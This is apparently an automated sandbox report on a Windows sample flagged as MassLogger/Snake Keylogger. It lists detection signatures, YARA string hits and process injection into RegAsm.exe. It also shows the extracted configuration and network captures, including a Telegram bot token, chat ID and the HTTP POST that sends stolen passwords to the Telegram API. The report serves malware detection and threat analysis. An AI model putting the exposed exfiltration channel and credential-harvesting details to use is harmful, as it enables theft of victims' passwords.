Edit tour

Windows Analysis Report
z87sammylastborn.exe

Overview

General Information

Sample name:	z87sammylastborn.exe
Analysis ID:	1588302
MD5:	a5211c64910b02b059f301b05de54b16
SHA1:	1f1ee1f8602bdc6400bc0290b1428e9f0362d4e9
SHA256:	93b30930ca258fb9815309b89e3e5941d072832ab728a7af042f9c8d79a72d22
Tags:	exeuser-Porcupine
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

z87sammylastborn.exe (PID: 5656 cmdline: "C:\Users\user\Desktop\z87sammylastborn.exe" MD5: A5211C64910B02B059F301B05DE54B16)

RegAsm.exe (PID: 2276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4", "Telegram Chatid": "6790572687"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefb7:$a1: get_encryptedPassword 0xf2df:$a2: get_encryptedUsername 0xed52:$a3: get_timePasswordChanged 0xee73:$a4: get_passwordField 0xefcd:$a5: set_encryptedPassword 0x10929:$a7: get_logins 0x105da:$a8: GetOutlookPasswords 0x103cc:$a9: StartKeylogger 0x10879:$a10: KeyLoggerEventArgs 0x10429:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa43d7:$a1: get_encryptedPassword 0xbb207:$a1: get_encryptedPassword 0xd1e27:$a1: get_encryptedPassword 0xa46ff:$a2: get_encryptedUsername 0xbb52f:$a2: get_encryptedUsername 0xd214f:$a2: get_encryptedUsername 0xa4172:$a3: get_timePasswordChanged 0xbafa2:$a3: get_timePasswordChanged 0xd1bc2:$a3: get_timePasswordChanged 0xa4293:$a4: get_passwordField 0xbb0c3:$a4: get_passwordField 0xd1ce3:$a4: get_passwordField 0xa43ed:$a5: set_encryptedPassword 0xbb21d:$a5: set_encryptedPassword 0xd1e3d:$a5: set_encryptedPassword 0xa5d49:$a7: get_logins 0xbcb79:$a7: get_logins 0xd3799:$a7: get_logins 0xa59fa:$a8: GetOutlookPasswords 0xbc82a:$a8: GetOutlookPasswords 0xd344a:$a8: GetOutlookPasswords
Process Memory Space: z87sammylastborn.exe PID: 5656	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: z87sammylastborn.exe PID: 5656	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: z87sammylastborn.exe PID: 5656	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: z87sammylastborn.exe PID: 5656	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: z87sammylastborn.exe PID: 5656	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x67ae:$a1: get_encryptedPassword 0x6a49:$a2: get_encryptedUsername 0x656a:$a3: get_timePasswordChanged 0x667e:$a4: get_passwordField 0x67c4:$a5: set_encryptedPassword 0x7c5f:$a7: get_logins 0x798d:$a8: GetOutlookPasswords 0x77c7:$a9: StartKeylogger 0x7bc4:$a10: KeyLoggerEventArgs 0x7824:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegAsm.exe PID: 2276	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2276	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2276	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x254d3:$a1: get_encryptedPassword 0x257ec:$a2: get_encryptedUsername 0x25282:$a3: get_timePasswordChanged 0x253a3:$a4: get_passwordField 0x254e9:$a5: set_encryptedPassword 0x26dec:$a7: get_logins 0x26a9d:$a8: GetOutlookPasswords 0x2688f:$a9: StartKeylogger 0x26d3c:$a10: KeyLoggerEventArgs 0x268ec:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.z87sammylastborn.exe.3b3e220.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.z87sammylastborn.exe.3b3e220.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.z87sammylastborn.exe.3b3e220.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.z87sammylastborn.exe.3b3e220.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
0.2.z87sammylastborn.exe.3b3e220.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data 0x12967:$a5: \Kometa\User Data\Default\Login Data
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
3.2.RegAsm.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data
0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25fe7:$a1: get_encryptedPassword 0x3cc07:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x2630f:$a2: get_encryptedUsername 0x3cf2f:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25d82:$a3: get_timePasswordChanged 0x3c9a2:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25ea3:$a4: get_passwordField 0x3cac3:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25ffd:$a5: set_encryptedPassword 0x3cc1d:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27959:$a7: get_logins 0x3e579:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x2760a:$a8: GetOutlookPasswords 0x3e22a:$a8: GetOutlookPasswords
0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2af93:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x41bb3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a491:$a3: \Google\Chrome\User Data\Default\Login Data 0x410b1:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x2a79f:$a4: \Orbitum\User Data\Default\Login Data 0x413bf:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data 0x2b597:$a5: \Kometa\User Data\Default\Login Data 0x421b7:$a5: \Kometa\User Data\Default\Login Data
0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x50227:$a1: get_encryptedPassword 0x67057:$a1: get_encryptedPassword 0x7dc77:$a1: get_encryptedPassword 0x5054f:$a2: get_encryptedUsername 0x6737f:$a2: get_encryptedUsername 0x7df9f:$a2: get_encryptedUsername 0x4ffc2:$a3: get_timePasswordChanged 0x66df2:$a3: get_timePasswordChanged 0x7da12:$a3: get_timePasswordChanged 0x500e3:$a4: get_passwordField 0x66f13:$a4: get_passwordField 0x7db33:$a4: get_passwordField 0x5023d:$a5: set_encryptedPassword 0x6706d:$a5: set_encryptedPassword 0x7dc8d:$a5: set_encryptedPassword 0x51b99:$a7: get_logins 0x689c9:$a7: get_logins 0x7f5e9:$a7: get_logins 0x5184a:$a8: GetOutlookPasswords 0x6867a:$a8: GetOutlookPasswords 0x7f29a:$a8: GetOutlookPasswords
0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x551d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6c003:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x82c23:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x546d1:$a3: \Google\Chrome\User Data\Default\Login Data 0x6b501:$a3: \Google\Chrome\User Data\Default\Login Data 0x82121:$a3: \Google\Chrome\User Data\Default\Login Data 0x549df:$a4: \Orbitum\User Data\Default\Login Data 0x6b80f:$a4: \Orbitum\User Data\Default\Login Data 0x8242f:$a4: \Orbitum\User Data\Default\Login Data 0x557d7:$a5: \Kometa\User Data\Default\Login Data 0x6c607:$a5: \Kometa\User Data\Default\Login Data 0x83227:$a5: \Kometa\User Data\Default\Login Data
0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7a057:$a1: get_encryptedPassword 0x90e87:$a1: get_encryptedPassword 0xa7aa7:$a1: get_encryptedPassword 0x7a37f:$a2: get_encryptedUsername 0x911af:$a2: get_encryptedUsername 0xa7dcf:$a2: get_encryptedUsername 0x79df2:$a3: get_timePasswordChanged 0x90c22:$a3: get_timePasswordChanged 0xa7842:$a3: get_timePasswordChanged 0x79f13:$a4: get_passwordField 0x90d43:$a4: get_passwordField 0xa7963:$a4: get_passwordField 0x7a06d:$a5: set_encryptedPassword 0x90e9d:$a5: set_encryptedPassword 0xa7abd:$a5: set_encryptedPassword 0x7b9c9:$a7: get_logins 0x927f9:$a7: get_logins 0xa9419:$a7: get_logins 0x7b67a:$a8: GetOutlookPasswords 0x924aa:$a8: GetOutlookPasswords 0xa90ca:$a8: GetOutlookPasswords
0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x7f003:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x95e33:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xaca53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e501:$a3: \Google\Chrome\User Data\Default\Login Data 0x95331:$a3: \Google\Chrome\User Data\Default\Login Data 0xabf51:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e80f:$a4: \Orbitum\User Data\Default\Login Data 0x9563f:$a4: \Orbitum\User Data\Default\Login Data 0xac25f:$a4: \Orbitum\User Data\Default\Login Data 0x7f607:$a5: \Kometa\User Data\Default\Login Data 0x96437:$a5: \Kometa\User Data\Default\Login Data 0xad057:$a5: \Kometa\User Data\Default\Login Data
Click to see the 20 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:44:40.124585+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49711	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:44:32.994323+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	132.226.247.73	80	TCP
2025-01-10T23:44:39.242851+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:44:39.863580+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49711	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: z87sammylastborn.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4", "Telegram Chatid": "6790572687"}
Source: RegAsm.exe.2276.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendMessage"}

Multi AV Scanner detection for submitted file

Source: z87sammylastborn.exe	Virustotal: Detection: 50%			Perma Link
Source: z87sammylastborn.exe	ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: z87sammylastborn.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: z87sammylastborn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: z87sammylastborn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\z87sammylastborn.exe	Code function: 4x nop then jmp 05078536h	0_2_05078358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 02A45782h	3_2_02A45358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 02A451B9h	3_2_02A44F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 02A45782h	3_2_02A456AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D1935h	3_2_050D15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DC7D8h	3_2_050DC530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D0FF1h	3_2_050D0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DF028h	3_2_050DED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DD088h	3_2_050DCDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DDEC8h	3_2_050DDC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D3EF8h	3_2_050D3C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DBF28h	3_2_050DBC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D0741h	3_2_050D0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DE778h	3_2_050DE4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D31F0h	3_2_050D2F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DB220h	3_2_050DAF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D3AA0h	3_2_050D37F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DA0C0h	3_2_050D9E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DF8D8h	3_2_050DF630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DD93Ah	3_2_050DD690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DA970h	3_2_050DA6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DEBD0h	3_2_050DE928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DCC30h	3_2_050DC988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D1449h	3_2_050D11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DF480h	3_2_050DF1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DBAD0h	3_2_050DB828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D02E9h	3_2_050D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DE320h	3_2_050DE078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D4350h	3_2_050D40A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DC380h	3_2_050DC0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D0B99h	3_2_050D08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DADC8h	3_2_050DAB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D3648h	3_2_050D33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DB678h	3_2_050DB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DD4E0h	3_2_050DD238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DA518h	3_2_050DA270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050DFD30h	3_2_050DFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 050D2D98h	3_2_050D2AF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:63598 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319e7496d93bHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319e7496d93bHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
